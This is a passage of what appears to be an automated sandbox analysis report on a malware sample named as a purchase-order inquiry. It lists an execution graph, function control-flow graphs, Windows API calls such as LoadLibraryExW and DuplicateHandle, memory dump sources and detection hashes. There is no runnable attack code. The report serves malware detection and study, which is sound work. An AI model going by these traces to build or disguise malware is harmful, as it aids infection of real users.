                                                                                            execution_graph 14926 7c684c0 14927 7c6864b 14926->14927 14928 7c684e6 14926->14928 14928->14927 14930 7c68740 PostMessageW 14928->14930 14931 7c687ac 14930->14931 14931->14928 14932 308b830 14933 308b835 14932->14933 14937 308b9e0 14933->14937 14941 308b9f0 14933->14941 14934 308b945 14938 308b9ec 14937->14938 14945 308a26c 14938->14945 14942 308b9f1 14941->14942 14943 308a26c DuplicateHandle 14942->14943 14944 308ba1e 14943->14944 14944->14934 14946 308ba58 DuplicateHandle 14945->14946 14948 308ba1e 14946->14948 14948->14934 14949 3089450 14950 3089451 14949->14950 14954 3089538 14950->14954 14962 3089548 14950->14962 14951 308945f 14955 308953c 14954->14955 14957 3089573 14955->14957 14970 30897c0 14955->14970 14974 30897d0 14955->14974 14956 308956b 14956->14957 14958 3089770 GetModuleHandleW 14956->14958 14957->14951 14959 308979d 14958->14959 14959->14951 14963 3089549 14962->14963 14964 3089573 14963->14964 14968 30897c0 LoadLibraryExW 14963->14968 14969 30897d0 LoadLibraryExW 14963->14969 14964->14951 14965 308956b 14965->14964 14966 3089770 GetModuleHandleW 14965->14966 14967 308979d 14966->14967 14967->14951 14968->14965 14969->14965 14971 30897c4 14970->14971 14972 3089809 14971->14972 14978 3088868 14971->14978 14972->14956 14975 30897d1 14974->14975 14976 3088868 LoadLibraryExW 14975->14976 14977 3089809 14975->14977 14976->14977 14977->14956 14979 30899b0 LoadLibraryExW 14978->14979 14981 3089a29 14979->14981 14981->14972 14982 30840d0 14983 30840d1 14982->14983 14986 30840ee 14983->14986 14988 30841e0 14983->14988 14985 308410d 14993 30838a4 14986->14993 14989 30841e4 14988->14989 14997 30842e0 14989->14997 15001 30842d0 14989->15001 14994 30838af 14993->14994 15009 3085834 14994->15009 14996 3086a68 14996->14985 14999 30842e1 14997->14999 14998 30843e4 14998->14998 14999->14998 15005 3083e2c 14999->15005 15003 30842d4 15001->15003 15002 30843e4 15002->15002 15003->15002 15004 3083e2c CreateActCtxA 15003->15004 15004->15002 15006 3085370 CreateActCtxA 15005->15006 15008 3085433 15006->15008 15010 308583f 15009->15010 15013 3085854 15010->15013 15012 3086b40 15012->14996 15014 308585f 15013->15014 15017 3085874 15014->15017 15016 3086be5 15016->15012 15018 308587f 15017->15018 15021 30858a4 15018->15021 15020 3086cc2 15020->15016 15022 30858af 15021->15022 15025 30858d4 15022->15025 15024 3086dc2 15024->15020 15026 30858df 15025->15026 15027 3087289 15026->15027 15033 3087528 15026->15033 15028 308751c 15027->15028 15039 308b70b 15027->15039 15044 308b568 15027->15044 15050 308b558 15027->15050 15028->15024 15034 30874d9 15033->15034 15035 308751c 15034->15035 15036 308b558 2 API calls 15034->15036 15037 308b568 2 API calls 15034->15037 15038 308b70b 2 API calls 15034->15038 15035->15027 15036->15035 15037->15035 15038->15035 15040 308b64b 15039->15040 15041 308b712 15039->15041 15040->15028 15042 308b75f 15041->15042 15056 308a1e4 15041->15056 15042->15028 15045 308b56d 15044->15045 15046 308b5ad 15045->15046 15048 308b70b 2 API calls 15045->15048 15085 308b718 15045->15085 15089 308b6d5 15045->15089 15046->15028 15048->15046 15051 308b55c 15050->15051 15052 308b5ad 15051->15052 15053 308b718 2 API calls 15051->15053 15054 308b70b 2 API calls 15051->15054 15055 308b6d5 2 API calls 15051->15055 15052->15028 15053->15052 15054->15052 15055->15052 15057 308a1ef 15056->15057 15059 308c458 15057->15059 15060 308a2a8 15057->15060 15059->15059 15061 308a2b3 15060->15061 15062 30858d4 2 API calls 15061->15062 15063 308c4c7 15062->15063 15064 308c4d5 15063->15064 15069 308c530 15063->15069 15075 308e250 15064->15075 15080 308e243 15064->15080 15065 308c500 15065->15059 15070 308c4ea 15069->15070 15072 308c536 15069->15072 15070->15072 15073 308e250 LoadLibraryExW GetModuleHandleW 15070->15073 15074 308e243 LoadLibraryExW GetModuleHandleW 15070->15074 15071 308c500 15071->15064 15073->15071 15074->15071 15076 308e251 15075->15076 15077 308e28d 15076->15077 15078 308e6c0 LoadLibraryExW GetModuleHandleW 15076->15078 15079 308e6d0 LoadLibraryExW GetModuleHandleW 15076->15079 15077->15065 15078->15077 15079->15077 15082 308e24c 15080->15082 15081 308e28d 15081->15065 15082->15081 15083 308e6c0 LoadLibraryExW GetModuleHandleW 15082->15083 15084 308e6d0 LoadLibraryExW GetModuleHandleW 15082->15084 15083->15081 15084->15081 15086 308b719 15085->15086 15087 308b75f 15086->15087 15088 308a1e4 2 API calls 15086->15088 15087->15046 15088->15087 15090 308b6dc 15089->15090 15091 308b686 15090->15091 15092 308a1e4 2 API calls 15090->15092 15091->15046 15092->15091

                                                                                            Executed Functions

                                                                                            Function 07C696C8 Relevance: .6, Instructions: 625COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 693 7c696c8-7c696ea 694 7c696f0-7c6972b call 7c68f54 call 7c68f64 call 7c692b8 693->694 695 7c69a9a-7c69a9f 693->695 707 7c6973e-7c6975e 694->707 708 7c6972d-7c69737 694->708 697 7c69aa1-7c69aa3 695->697 698 7c69aa9-7c69aac 695->698 697->698 701 7c69ab4-7c69abc 698->701 703 7c69ac2-7c69ac9 701->703 710 7c69760-7c6976a 707->710 711 7c69771-7c69791 707->711 708->707 710->711 713 7c697a4-7c697c4 711->713 714 7c69793-7c6979d 711->714 716 7c697c6-7c697d0 713->716 717 7c697d7-7c697e0 call 7c692c8 713->717 714->713 716->717 720 7c69804-7c6980d call 7c692d8 717->720 721 7c697e2-7c697fd call 7c692c8 717->721 726 7c69831-7c6983a call 7c692e8 720->726 727 7c6980f-7c6982a call 7c692d8 720->727 721->720 733 7c69845-7c69861 726->733 734 7c6983c-7c69840 call 7c692f8 726->734 727->726 738 7c69863-7c69869 733->738 739 7c69879-7c6987d 733->739 734->733 740 7c6986d-7c6986f 738->740 741 7c6986b 738->741 742 7c69897-7c698df 739->742 743 7c6987f-7c69890 call 7c69308 739->743 740->739 741->739 749 7c69903-7c6990a 742->749 750 7c698e1 742->750 743->742 752 7c69921-7c6992f call 7c69318 749->752 753 7c6990c-7c6991b 749->753 751 7c698e4-7c698ea 750->751 755 7c698f0-7c698f6 751->755 756 7c69aca-7c69b09 751->756 761 7c69931-7c69933 752->761 762 7c69939-7c69963 752->762 753->752 758 7c69900-7c69901 755->758 759 7c698f8-7c698fa 755->759 764 7c69b67-7c69b77 756->764 765 7c69b0b-7c69b2c 756->765 758->749 758->751 759->758 761->762 777 7c69965-7c69973 762->777 778 7c69990-7c699ac 762->778 771 7c69d4d-7c69d54 764->771 772 7c69b7d-7c69b87 764->772 765->764 769 7c69b2e-7c69b34 765->769 775 7c69b36-7c69b38 769->775 776 7c69b42-7c69b47 769->776 773 7c69d56-7c69d5e call 7c6944c 771->773 774 7c69d63-7c69d76 771->774 779 7c69b91-7c69b9b 772->779 780 7c69b89-7c69b90 772->780 773->774 775->776 784 7c69b53-7c69b60 776->784 785 7c69b49-7c69b4d 776->785 777->778 793 7c69975-7c69989 777->793 790 7c699ae-7c699b8 778->790 791 7c699bf-7c699e6 call 7c69328 778->791 781 7c69d80-7c69e1a 779->781 782 7c69ba1-7c69be1 779->782 841 7c69e21-7c69e57 781->841 842 7c69e1c 781->842 810 7c69be3-7c69be9 782->810 811 7c69bf9-7c69bfd 782->811 784->764 785->784 790->791 802 7c699fe-7c69a02 791->802 803 7c699e8-7c699ee 791->803 793->778 807 7c69a04-7c69a16 802->807 808 7c69a1d-7c69a39 802->808 805 7c699f2-7c699f4 803->805 806 7c699f0 803->806 805->802 806->802 807->808 820 7c69a51-7c69a55 808->820 821 7c69a3b-7c69a41 808->821 815 7c69bed-7c69bef 810->815 816 7c69beb 810->816 817 7c69bff-7c69c24 811->817 818 7c69c2a-7c69c42 call 7c6943c 811->818 815->811 816->811 817->818 832 7c69c44-7c69c49 818->832 833 7c69c4f-7c69c57 818->833 820->703 827 7c69a57-7c69a65 820->827 825 7c69a45-7c69a47 821->825 826 7c69a43 821->826 825->820 826->820 834 7c69a77-7c69a7b 827->834 835 7c69a67-7c69a75 827->835 832->833 837 7c69c6d-7c69c8c 833->837 838 7c69c59-7c69c67 833->838 840 7c69a81-7c69a99 834->840 835->834 835->840 845 7c69ca4-7c69ca8 837->845 846 7c69c8e-7c69c94 837->846 838->837 854 7c69e61 841->854 855 7c69e59 841->855 842->841 851 7c69d01-7c69d4a 845->851 852 7c69caa-7c69cb7 845->852 849 7c69c96 846->849 850 7c69c98-7c69c9a 846->850 849->845 850->845 851->771 859 7c69ced-7c69cfa 852->859 860 7c69cb9-7c69ceb 852->860 855->854 859->851 860->859
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.470370712.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7c60000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15f87f615cc7ed52162c0e0603677389f89a445942f8e7d899d81585104a14bd
                                                                                            • Instruction ID: dbae3d66ce4b9a315ade24dc858f7557735d7ef569855a7113e314f212b4de7e
                                                                                            • Opcode Fuzzy Hash: 15f87f615cc7ed52162c0e0603677389f89a445942f8e7d899d81585104a14bd
                                                                                            • Instruction Fuzzy Hash: 3532BBB4B012059FDB29EBA9C4D4BAEB7F6AF88300F14846DE1459B3A0DB35ED01CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03089548 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0308978E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 52971571d70115dbb6f9e4bd9d3faf644f8b32682c1fba477199cad2e5816cf6
                                                                                            • Instruction ID: d12d965ca1fe7b37b0bb8b0614cb5ca28ca314432b63e6a7853dc3bbf5928662
                                                                                            • Opcode Fuzzy Hash: 52971571d70115dbb6f9e4bd9d3faf644f8b32682c1fba477199cad2e5816cf6
                                                                                            • Instruction Fuzzy Hash: 91713370A01B058FDB64EF6AD4447AABBF5BF88214F04892ED48AD7A40DB35E845CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03085364 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 60 3085364-3085366 61 3085368-308536a 60->61 62 308536d-308536e 60->62 63 308536c 61->63 64 3085371-3085374 61->64 65 3085370 62->65 66 3085375-3085431 CreateActCtxA 62->66 63->62 64->66 65->64 68 308543a-3085494 66->68 69 3085433-3085439 66->69 76 30854a3-30854a7 68->76 77 3085496-3085499 68->77 69->68 78 30854b8 76->78 79 30854a9-30854b5 76->79 77->76 81 30854b9 78->81 79->78 81->81
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 03085421
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: e78ad919a2c3680daea031c37cd247d91f5c1c63237a74178e9f8316ccfd7e56
                                                                                            • Instruction ID: c683b6ee5768543009d43fa429e4709547eeaa9e9c16445575b7403cf0840de0
                                                                                            • Opcode Fuzzy Hash: e78ad919a2c3680daea031c37cd247d91f5c1c63237a74178e9f8316ccfd7e56
                                                                                            • Instruction Fuzzy Hash: A04135B1C00218CFDB24DFAAC844BDEBBF5BF49309F648469D448AB251D775594ACF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03083E2C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 82 3083e2c-3085431 CreateActCtxA 87 308543a-3085494 82->87 88 3085433-3085439 82->88 95 30854a3-30854a7 87->95 96 3085496-3085499 87->96 88->87 97 30854b8 95->97 98 30854a9-30854b5 95->98 96->95 100 30854b9 97->100 98->97 100->100
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 03085421
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 9a46262d7d4591c9b704e73128e2464bc9a9ee383f23167c2da602eec5e288d8
                                                                                            • Instruction ID: 2858fe5d62e79f767c1000948d6e09b8934448eeb3b95a5fba419e26e340bb5f
                                                                                            • Opcode Fuzzy Hash: 9a46262d7d4591c9b704e73128e2464bc9a9ee383f23167c2da602eec5e288d8
                                                                                            • Instruction Fuzzy Hash: C34122B0C00618CFCB24DFAAC884BCEBBF5BF49308F60846AD448AB251D7756949CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0308A26C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 101 308a26c-308baec DuplicateHandle 104 308baee-308baf4 101->104 105 308baf5-308bb12 101->105 104->105
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308BA1E,?,?,?,?,?), ref: 0308BADF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 49a247f2a44a8a4bd2896d2abf307d78c9ba7d1f4d6dc071bec3ba4f3456533b
                                                                                            • Instruction ID: 8e7b1da029a17f0ccb375ca9e8a45c8b6518824ef14be15abe0ee60f8025ad80
                                                                                            • Opcode Fuzzy Hash: 49a247f2a44a8a4bd2896d2abf307d78c9ba7d1f4d6dc071bec3ba4f3456533b
                                                                                            • Instruction Fuzzy Hash: 9021E3B59012499FDB10CF9AD884AEEBBF8FB48320F14842AE954A3350D375A954CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0308BA51 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 108 308ba51-308ba56 109 308ba58-308ba5c 108->109 110 308ba5d-308baec DuplicateHandle 108->110 109->110 111 308baee-308baf4 110->111 112 308baf5-308bb12 110->112 111->112
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308BA1E,?,?,?,?,?), ref: 0308BADF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 44b083589c4e500a21ae98454d02289a404c89e2094ab1543386b89a2774e64c
                                                                                            • Instruction ID: 75c9000ebd7623b81a33bf0670168111d75c6e8e98764c5e8aa0a0065959436e
                                                                                            • Opcode Fuzzy Hash: 44b083589c4e500a21ae98454d02289a404c89e2094ab1543386b89a2774e64c
                                                                                            • Instruction Fuzzy Hash: 5321E3B59012099FDB10CFAAD884AEEBBF8FF48320F14841AE954A3310D375A944CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 030899A8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 115 30899a8-30899aa 116 30899ac-30899af 115->116 117 30899b1-30899f0 115->117 116->117 118 30899f8-3089a27 LoadLibraryExW 117->118 119 30899f2-30899f5 117->119 120 3089a29-3089a2f 118->120 121 3089a30-3089a4d 118->121 119->118 120->121
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03089809,00000800,00000000,00000000), ref: 03089A1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 9863f2bf0b5c041d3ae93daf8dec1b98592352942a27b61d0081d26649ced350
                                                                                            • Instruction ID: 6fcc08513bf0677f92d82c038836c53cf4c9409abbd0f33504de825f0aa94bab
                                                                                            • Opcode Fuzzy Hash: 9863f2bf0b5c041d3ae93daf8dec1b98592352942a27b61d0081d26649ced350
                                                                                            • Instruction Fuzzy Hash: 151117B6D002099FCB10DF9AD884BEEFBF8AB89320F14852AD555B7310C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03088868 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 124 3088868-30899f0 127 30899f8-3089a27 LoadLibraryExW 124->127 128 30899f2-30899f5 124->128 129 3089a29-3089a2f 127->129 130 3089a30-3089a4d 127->130 128->127 129->130
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03089809,00000800,00000000,00000000), ref: 03089A1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 964c553d7e93fe4545758ede62dafe8c68760a74d1c18355676c510bb5314b15
                                                                                            • Instruction ID: 0a1f17cff7c9d7b5a7554fc9e174d5f243864f6e6abbc40997d1f1579d512f16
                                                                                            • Opcode Fuzzy Hash: 964c553d7e93fe4545758ede62dafe8c68760a74d1c18355676c510bb5314b15
                                                                                            • Instruction Fuzzy Hash: CE1106B59002098FCB10DF9AD884AEEFBF4AB48310F14842AD455B7200C375A945CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03089728 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 133 3089728-3089768 136 308976a-308976d 133->136 137 3089770-308979b GetModuleHandleW 133->137 136->137 138 308979d-30897a3 137->138 139 30897a4-30897b8 137->139 138->139
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0308978E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 35a09a5c1c2a87ce9c5ca71fcabb8703ad817da323f259f8b69317c2017916c8
                                                                                            • Instruction ID: 87fa527039f79ed653b67e25c692d4933d56980d95537c0e5f9513fa12fe8c25
                                                                                            • Opcode Fuzzy Hash: 35a09a5c1c2a87ce9c5ca71fcabb8703ad817da323f259f8b69317c2017916c8
                                                                                            • Instruction Fuzzy Hash: 9E110FB5C002098FCB10DF9AC444AEFFBF8AF88224F14842AD859A7200C379A545CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 07C68740 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 141 7c68740-7c687aa PostMessageW 142 7c687b3-7c687c7 141->142 143 7c687ac-7c687b2 141->143 143->142
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07C6879D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.470370712.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7c60000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: ba86a29ae1355f085c58081953540a5f1e62600acf5033d97921f3d7f8838161
                                                                                            • Instruction ID: cfb35bcfb90144f116e6ea488cc820ff560b1b56301cce87ce410d7c673aab15
                                                                                            • Opcode Fuzzy Hash: ba86a29ae1355f085c58081953540a5f1e62600acf5033d97921f3d7f8838161
                                                                                            • Instruction Fuzzy Hash: 9E11E5B5800349DFDB10CF99D888BDEBBF8FB48324F148819E954A7240C375A984CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 017FD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462638418.00000000017FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_17fd000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0c2f5fc68645c088263b67a7668251d129a5274468f309e522c7cd3b1fe4e7f0
                                                                                            • Instruction ID: cb29ef45859b2e73124ba90bdf9bff7cb0b7a617524bb7bb16bcb821d3ba3f7e
                                                                                            • Opcode Fuzzy Hash: 0c2f5fc68645c088263b67a7668251d129a5274468f309e522c7cd3b1fe4e7f0
                                                                                            • Instruction Fuzzy Hash: BD21F4B1504244DFDB15CF94D9C4BA7FBA9FB88324F2485ADEE050B346C336E856C6A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0180D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462711156.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_180d000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f5f10e0d704ec7fc18c1b6a4bd3b9f49a1fde8e4ece44d31b4ffbb4fba567eed
                                                                                            • Instruction ID: 7bb67dcb56b4a3dfba7493cdc13ca9de46b0c6487180895f31461d6334aef091
                                                                                            • Opcode Fuzzy Hash: f5f10e0d704ec7fc18c1b6a4bd3b9f49a1fde8e4ece44d31b4ffbb4fba567eed
                                                                                            • Instruction Fuzzy Hash: 78212B71504308DFDB46CFD4C9C0B25BBA5FB84328F24CA6DD8058B282C336E506C651
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0180D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462711156.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_180d000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70d4ae29333d4c0e9668a6e5924b4af0c15febb699f5c4ffb343b3b4f0082b8f
                                                                                            • Instruction ID: 89e6151b5d1d430b42006309090a89e098b81b99538aff3dc6144c999767339a
                                                                                            • Opcode Fuzzy Hash: 70d4ae29333d4c0e9668a6e5924b4af0c15febb699f5c4ffb343b3b4f0082b8f
                                                                                            • Instruction Fuzzy Hash: F3210671504248DFDB56CFA4D8C4B16BBA5FB88358F24CA6DD84D8B286C337D906CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 017FD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462638418.00000000017FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_17fd000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89cab565afb9096415ec76201e3a3567f3b82aa6e5430c9b10a616fa3bee2fd6
                                                                                            • Instruction ID: a766da8d16b1e6124e394605ae851186833b06602fcc7a3d34d412883a9d4482
                                                                                            • Opcode Fuzzy Hash: 89cab565afb9096415ec76201e3a3567f3b82aa6e5430c9b10a616fa3bee2fd6
                                                                                            • Instruction Fuzzy Hash: 24119D76404280DFDB12CF54D5C4B66BF61FB84224F2886A9D9090B656C33AE45ACBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0180D017 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462711156.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_180d000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bbc4167c3c97515e31d18ccee52d8336f50c7ccc6e38931adc408a7337d2e844
                                                                                            • Instruction ID: ecb150216075e93ebc4a589bd5ad751527878dacf725a97b7964e762fde06683
                                                                                            • Opcode Fuzzy Hash: bbc4167c3c97515e31d18ccee52d8336f50c7ccc6e38931adc408a7337d2e844
                                                                                            • Instruction Fuzzy Hash: DF11BE75504284CFCB12CF54D9C4B15BB61FB44324F28C6AAD8098B696C33AD54ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0180D1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.462711156.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_180d000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bbc4167c3c97515e31d18ccee52d8336f50c7ccc6e38931adc408a7337d2e844
                                                                                            • Instruction ID: d85095b01fab701602a654520e98118c13dec2edcc6c2fcbf922cd43ea74a25c
                                                                                            • Opcode Fuzzy Hash: bbc4167c3c97515e31d18ccee52d8336f50c7ccc6e38931adc408a7337d2e844
